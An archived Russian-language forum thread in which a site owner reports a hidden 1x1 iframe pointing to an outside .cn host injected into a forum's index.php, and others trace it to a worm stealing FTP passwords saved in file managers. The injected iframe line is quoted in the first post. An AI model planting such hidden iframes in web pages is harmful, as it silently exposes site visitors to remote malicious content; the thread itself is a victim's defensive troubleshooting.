Текущий архив: 2009.05.10;
Скачать: CL | DM;
Вниз
Форум и робот-хакер Найти похожие ветки
← →
Real © (2009-03-02 13:29) [0]Всем привет. Недавно зайдя на свой форум, обнаружил что главная страница выдает ошибку в index.php Зашел на хост и в самом конце обнаружил следующее:
<html><body><iframe src="http://betstarwager.cn/in.cgi?cocacola77" width=1 height=1 style="visibility: hidden"></iframe></body></html>
Данный фрагмент, был вставлен после завершающего "?>" причем между "?" и ">" (естественно, это приводило к ошибке).
То есть, каким-то образом хакеру удалось выполнить редактирование файла на хостинге. Причем это явно сделал робот, т.к. более бестолкового места для внедрения своего кода трудно найти :) Больше никаких модификаций замечено не было. После удаления строки, все заработало. Сегодня ситуация повторилась, причем не только у меня. Мне написал знакомый с аналогичной проблемой. В его index.php форума - я обнаружил тоже самое, в том же самом месте.
Форумы разные (у меня SMF у него - phpBB). То есть вряд ли это уязвимость в движке. Подбор пароля - тоже мне кажется маловероятным (да и глупо просто, подобрав пароль так бездарно его использовать, вставляя бесполезную рекламную ссылку, которая к тому же валит форум и естественно будет удалена в кратчайщие строки).
Думал написать об этом на спец.форум поддержки движков форумов, но я убежден что дело не в уязвимости движка. Кто с таким сталкивался? Права на редактирования файла - стоят минимальные. Что посоветуете?
← →
Anatoly Podgoretsky © (2009-03-02 13:34) [1]> Real (02.03.2009 13:29:00) [0]
Взламывается хост и вслед за ним, за несколько миллисекунд все сайты на нем.
← →
Eraser © (2009-03-02 13:40) [2]> [0] Real © (02.03.09 13:29)
лечи вирусы. с такими вопросами к хостерам каждый день сотни клиентов обращаются. червь ворует пароли из тотла коммандера и получает доступ к хостингу, где портит все индекс-файлы.
← →
antonn © (2009-03-02 13:43) [3]
> Real © (02.03.09 13:29)
обычно это по ftp делают.
← →
Real © (2009-03-02 13:53) [4]
> лечи вирусы. с такими вопросами к хостерам каждый день сотни
> клиентов обращаются. червь ворует пароли из тотла коммандера
Я тоже вот об этом подумал :) Правда тотал не юзается, но юзается FAR. Тем более, что пару дней назад какая-то зараза завелась. Просканировал все, кучу антивирь нашел и удавил. Похоже что то осталось. Как ее теперь вычислить? Базы на антивире свежайщие
← →
Eraser © (2009-03-02 13:54) [5]> [4] Real © (02.03.09 13:53)
переустановить систему, сменить пароли на фтп.
← →
Real © (2009-03-02 13:57) [6]
> переустановить систему, сменить пароли на фтп.
ну это и так ясно что поможет :) я имел ввиду вариант помягче. Может кто-то узнал именно эту внедряемую строку и сможет по ней определить что за пакость и спец.лекарство
← →
Медвежонок Пятачок © (2009-03-02 14:03) [7]Подбор пароля - тоже мне кажется маловероятным
Остается только спонтанная самоорганизация магнитных доменов на харде хостера.
Посидели они за столом, перетерли, значит вопрос, и выстроились во вредоносную ссылку в файле твоей страницы
← →
Real © (2009-03-02 14:06) [8]
> Остается только спонтанная самоорганизация магнитных доменов
> на харде хостера.
> Посидели они за столом, перетерли, значит вопрос, и выстроились
> во вредоносную ссылку в файле твоей страницы
Прежде чем нести ахинею как обычно, кури внимательнее ветку - причина уже установлена пару постов назад.
← →
Медвежонок Пятачок © (2009-03-02 14:08) [9]ахинею про маловероятность нес как раз ты.
← →
Медвежонок Пятачок © (2009-03-02 14:10) [10]Просканировал все, кучу антивирь нашел и удавил.
Теперь расскажи новую ахинею, про то, что вирус на локальном компе стырил пароль, залез на сайт и модифицировал твою страницу
← →
Real © (2009-03-02 14:12) [11]
> ахинею про маловероятность нес как раз ты
Для слепых - смотрим пост № 4. В маловероятности я уверен, т.к. пароли у меня редко меньше 30 символов. И конечно же - это не просто слова, которые можно перебрать по словарю
← →
Медвежонок Пятачок © (2009-03-02 14:15) [12]В маловероятности я уверен
Я когда носил октябрятскую звездочку, тоже был уверен что ссср вечен.
такой же наивный был.
← →
antonn © (2009-03-02 14:30) [13]че вы спорите, логин и пароль в ftp передаются открытым текстом, нужно только перехватить :)
← →
Медвежонок Пятачок © (2009-03-02 14:33) [14]>antonn
ну что ты тут рассказываешь?. видишь, какой здесь сурьезный и уверенный перец. у него все под контролем, все очень длинное
:)
← →
Anatoly Podgoretsky © (2009-03-02 14:46) [15]
> В маловероятности я уверен, т.к. пароли у меня редко меньше
> 30 символов
Если воровать, то длина пароля роли не играет, не тяжело и тысяца символов.
Выбора у тебя нет, или с сайта/хоста ломают, или локально со свороваными паролями по ФТП. Оба метода широко распространены, особенно при использование Fat/TC.
← →
KSergey © (2009-03-02 14:57) [16]открою секрет: часто на хостинге есть дыры по части поправить сайт соседа. Часто эти дыры незакрываемы ввиду используемой архитекруты постоения хостинга, т.к. хостер свои ресурсы тоже экономит и всегда рассуждает так: для shared hosting и так сойдет, кому надо - пусть платит за олностью изолированный хостинг (это вовсе не обязательно выделенный сервер).
"плавали, знаем"
Может это тот случай?
← →
Anatoly Podgoretsky © (2009-03-02 15:21) [17]> KSergey (02.03.2009 14:57:16) [16]
Так через эти дыры все сайты хостинга ломают разом.
← →
KSergey © (2009-03-02 16:14) [18]> Anatoly Podgoretsky © (02.03.09 15:21) [17]
> Так через эти дыры все сайты хостинга ломают разом.
вроде как автор упоминал что не только он пострадал?
← →
Anatoly Podgoretsky © (2009-03-02 16:24) [19]> KSergey (02.03.2009 16:14:18) [18]
Упоминал, но не упоминал, пострадали ли все остальные сайты этого рода.
Рекорд взлома сайтов свыше 7000 сайтов за секунду.
← →
Real © (2009-03-03 14:46) [20]
> Я когда носил октябрятскую звездочку, тоже был уверен что
> ссср вечен.
Для тех кто едет на бронепоезде с неснятым ручником, пишу третий раз: причина уже давно установлена, еще в посте [4]. А тебе как обычно лишь с кем-то спорить, кого-то оскорблять и позиционировать себе мего-спецом. На моей памяти - ты на форуме не написал ничего полезного, только как бабка подъездная верещишь.
> Если воровать, то длина пароля роли не играет, не тяжело
> и тысяца символов
Речь была не о воровстве, а о подборе пароля
> вроде как автор упоминал что не только он пострадал?
Все подтвердилось как и сказал Eraser в посте [2]. Убрал из FAR сохранение паролей, и фигня прекратилась. Насчет пострадал не только я - все объясняется просто, помимо меня, пострадали те, чьи FTP были настроены у меня в фаре :) Поубирал везеде пароли (тренерую память :) все ок. Спасибо всем за помощь, особенно Eraser. Сразу видно опытного специалиста!
← →
KSergey © (2009-03-03 15:22) [21]> Real © (03.03.09 14:46) [20]
> Поубирал везеде пароли (тренерую память :) все ок. Спасибо
> всем за помощь, особенно Eraser. Сразу видно опытного специалиста!
хм, выходит вирус по сей день с нами?
← →
Anatoly Podgoretsky © (2009-03-03 21:42) [22]> Real (03.03.2009 14:46:20) [20]
Ну это тебе хочетс говорить об подборе, а нам проще украсть.
← →
Vudu © (2009-03-03 22:04) [23]У меня сайт один рас взломали через старую версию CMS (Jomla)
← →
KilkennyCat © (2009-03-04 01:56) [24]если бу меня пароли были бы по 30 символов, я бы уже был в психушке. В принципе, весь мир - психушка, но я бы был в психушке внутри психушки... а вообще, я бы хотел что-нить иметь, чтоб паролировать аж 30-тью символами. После поимения этого можно и в психушку.
← →
Skyle © (2009-03-04 07:07) [25]
> KilkennyCat © (04.03.09 01:56) [24]
сороктысячобезьянвжопусунулибанан
← →
Real © (2009-03-04 16:47) [26]
> KilkennyCat
Пост [24] примерно дает представления как можно использовать такие (и более длинные) пароли, без напрягов и боязни угодить в психушку. Скажу лишь, что я использую более приличные словосочетания :)
Страницы: 1 вся ветка
Текущий архив: 2009.05.10;
Скачать: CL | DM;
Память: 0.53 MB
Время: 0.008 c
